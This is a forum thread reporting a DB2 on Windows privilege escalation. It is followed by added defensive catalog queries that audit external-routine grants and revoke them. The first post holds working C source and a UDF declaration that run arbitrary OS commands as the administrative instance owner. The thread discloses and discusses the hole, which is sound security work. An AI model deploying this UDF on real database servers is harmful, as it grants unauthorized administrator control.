Security issue with system call from C udf on Windows

Hello.

v8.2.1, Windows.
I have a default installation on Windows where the instance owner has
administrative rights in the system.
In this case a user with only CREATE_EXTERNAL_ROUTINE authority and
(IMPLICIT_SCHEMA authority or CREATEIN privilege) can get SYSADM
authority in DB2 and OS administrator rights!
Anybody can try this:
--- c source ---
#include <stdlib.h>
#include <sqludf.h>

void SQL_API_FN systemCall(
    SQLUDF_VARCHAR *command,      /* input */
    SQLUDF_INTEGER *result,       /* output */
    /* null indicators */
    SQLUDF_NULLIND *command_ind,
    SQLUDF_NULLIND *result_ind,
    SQLUDF_TRAIL_ARGS)
{
    int rc = 0;
    /* execute the command */
    rc = system(command);
    *result_ind = 0;
    *result = rc;
}
--- c source end ---
--- udf declaration ---
CREATE FUNCTION systemCall( command VARCHAR(2000) )
    RETURNS INTEGER
    SPECIFIC systemCall
    EXTERNAL NAME 'os_call!systemCall'
    LANGUAGE C
    PARAMETER STYLE SQL
    DETERMINISTIC
    FENCED
    RETURNS NULL ON NULL INPUT
    NO SQL
    EXTERNAL ACTION
    NO SCRATCHPAD
    DISALLOW PARALLEL;
--- udf declaration end ---

And now I can do anything with the instance and OS with such calls:
db2 values systemCall('db2cmd /i /w /c db2 ...')
db2 values systemCall('any_os_command_that_will_be_run_under_administrative_account')

For example:
db2 values systemCall('db2cmd /i /w /c db2 force applications all')
killed all connections in the instance including my own too.

What do you think about this?

Sincerely,
Mark B.

Nov 30 '06 #1
You need the rights to put the C module in the instance directory so if
you enable extended OS security you must belong to the DB2ADM system
group to do that. Only administrators should be allowed in this group so
it should not be a real issue.
Nov 30 '06 #2
But I can have rights to put the module anywhere in the LIBPATH or PATH of
the instance owner, or use an absolute path for registering.
In the last case it will be enough to find any path on the server where
the administrator has rights to read and I have rights to write...

Nov 30 '06 #3
I guess that's a very good example illustrating that the DBA should really
take care of privileges and who is allowed to create what kind of objects.
Your UDF directly exposes capabilities of the OS through SQL. You could
achieve the same with a different, more obfuscated UDF as well.

--
Knut Stolze
DB2 Information Integration Development
IBM Germany
Nov 30 '06 #4
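
Added example, not part of the thread and not IBM's code: catalog queries a DBA could run to act on the point made in the replies above, listing who holds CREATE_EXTERNAL_ROUTINE and which external routines are registered, including ones registered by absolute path as mentioned in reply #3. It assumes the SYSCAT.DBAUTH and SYSCAT.ROUTINES catalog views with the column names shown; `SOMEUSER` is a placeholder.

```sql
-- 1. Every user or group that can register external (C, Java, ...) routines.
--    On an instance whose owner is an OS administrator, each row is
--    effectively an OS administrator, as the first post shows.
SELECT GRANTEE,
       GRANTEETYPE,            -- 'U' = user, 'G' = group
       EXTERNALROUTINEAUTH,    -- CREATE_EXTERNAL_ROUTINE
       IMPLSCHEMAAUTH,         -- IMPLICIT_SCHEMA
       NOFENCEAUTH,            -- CREATE_NOT_FENCED_ROUTINE
       DBADMAUTH
FROM   SYSCAT.DBAUTH
WHERE  EXTERNALROUTINEAUTH = 'Y'
ORDER  BY GRANTEETYPE, GRANTEE;

-- 2. Inventory of user-defined external routines and the library each one
--    loads. Review anything unexpected, newest first.
SELECT ROUTINESCHEMA,
       ROUTINENAME,
       SPECIFICNAME,
       LANGUAGE,
       FENCED,
       IMPLEMENTATION,         -- e.g. 'os_call!systemCall'
       CREATE_TIME
FROM   SYSCAT.ROUTINES
WHERE  ORIGIN = 'E'
  AND  ROUTINESCHEMA NOT LIKE 'SYS%'
ORDER  BY CREATE_TIME DESC;

-- 3. Routines registered with an absolute library path, i.e. loaded from
--    outside the instance's function directory (the case raised in reply #3).
SELECT ROUTINESCHEMA, ROUTINENAME, IMPLEMENTATION
FROM   SYSCAT.ROUTINES
WHERE  ORIGIN = 'E'
  AND (IMPLEMENTATION LIKE '_:%'      -- drive-letter path on Windows
       OR IMPLEMENTATION LIKE '\\%'   -- UNC path
       OR IMPLEMENTATION LIKE '/%');  -- absolute path on UNIX

-- 4. Remove the authority from a grantee that should not have it.
--    SOMEUSER is a placeholder, not a name from the thread.
REVOKE CREATE_EXTERNAL_ROUTINE ON DATABASE FROM USER SOMEUSER;
```

Revoking the authority does not drop routines that were already created, so the inventory from queries 2 and 3 still needs to be reviewed.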
